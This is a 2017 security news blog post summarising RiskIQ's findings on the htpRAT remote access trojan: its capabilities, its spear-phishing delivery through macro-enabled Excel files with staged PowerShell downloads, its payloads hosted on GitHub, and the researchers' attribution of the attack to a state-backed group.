htpRAT Latest Sign that Cybercriminals are Getting Smarter

Posted Date 11/06/17

The htpRAT malware attack on a number of computers in Southeast Asia is yet one more sign that cybercriminals are getting smarter and more difficult to catch. Believed to be backed financially by the Chinese government, the htpRAT is a new-generation Remote Access Trojan malware that in addition to the usual features of this sort of malware also has additional ones that, unfortunately for the victims, improves its efficiency.

Like other RATs, the htpRAT uses logging keystrokes to steal security credentials, captures data from screenshots, can manage files on the victiom’s computer, and can record audio and video from a computer’s videocam. Yet, on top of that, the people behind the htpRAT use the Command and Control server side to create new functionalities and commands that are then sent to the malware for execution.

Writing for the Enterprise Times, technology analyst Ian Murphy notes that like other malware, the htpRAT is distributed via a spear phishing campaign sending an Excel file with macros that, when the file is enabled, start a Windows PwoerShell command and staged downloads.

The staged download approach makes it harder for the victim to detect the attack and easier for the cyberattacker to detect any cybersecurity software on the target device. Researchers from security solutions provider RiskIQ found that the malware downloaded code in five stages in total, with the first four setting the stage for the actual download of the malware program.

Interestingly Murphy notes, the cyberattackers behind the htpRAT hosted their payload on GitHub, which, unlike most payload servers, is unlikely to ever get blocked simply because of the number of organizations using it for software development. At the same time, the good news for cybersecurity researchers is that GitHub stores history, so the RiskIQ researchers were able to glean some common malware components and details about the identity of the attackers.

Among the information obtained about the attackers was the fact that they had registered their C2 domain two years ago, which, according to RiskIQ, means Chinese government backing: state-backed hackers enjoy more time to plan their attacks. For cybersecurity software that uses the age of domain registration as an indicator of the domain owner’s reputation, this is a way of subversion, used in this case as well. According to Murphy and RiskIQ, the attackers behind htpRAT have long-term plans that are linked to China’s regional dominance plans. Initially infecting small businesses, over time the attackers can start infecting larger, internationally present, organizations, potentially wreaking havoc on various industries.

Posted in Security | Tagged

Copyright © 2012 Recharge Asia Corp. All Rights Reserved. Terms under which this service is provided to you.
京公网安备: 11010802008822 号    京ICP 证 09052955